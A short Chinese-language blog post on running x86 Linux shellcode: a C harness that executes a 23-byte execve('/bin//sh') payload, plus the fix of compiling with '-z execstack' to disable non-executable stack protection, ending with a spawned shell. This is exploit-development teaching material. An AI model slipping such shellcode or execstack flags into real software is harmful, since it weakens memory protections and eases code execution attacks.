linux下執行shellcode__linux

參考了其他文章。

 

C語言代碼如下：

#include <stdio.h>#include <string.h>char sc[] =  "\x31\xc0"  "\x50"  "\x68\x6e\x2f\x73\x68"  "\x68\x2f\x2f\x62\x69"  "\x89\xe3"  "\x50"  "\x53"  "\x89\xe1"  "\xb0\x0b"  "\xcd\x80";int main(){  void (*fp)(void) = (void (*)(void))sc;  printf("Length: %d\n",strlen(sc));  fp();}

上面的sc就是shellcode。原始碼儲存為execve.c，然後編譯、串連。

[yang@localhost ~]$ gcc -o execve execve.c [yang@localhost ~]$ ./execve Length: 23孌甸敊璿[yang@localhost ~]$ 

結果如上，沒有執行shellcode，怎麼回事。我的gcc版本是4.3.0的。這個版本的gcc，編譯出來的可執行檔的堆棧段，是不可執行檔。

加上參數-z execstack就能變成可執行了。

[yang@localhost ~]$ gcc -z execstack -o execve execve.c [yang@localhost ~]$ ./execve Length: 23sh-3.2$

獲得了一個shell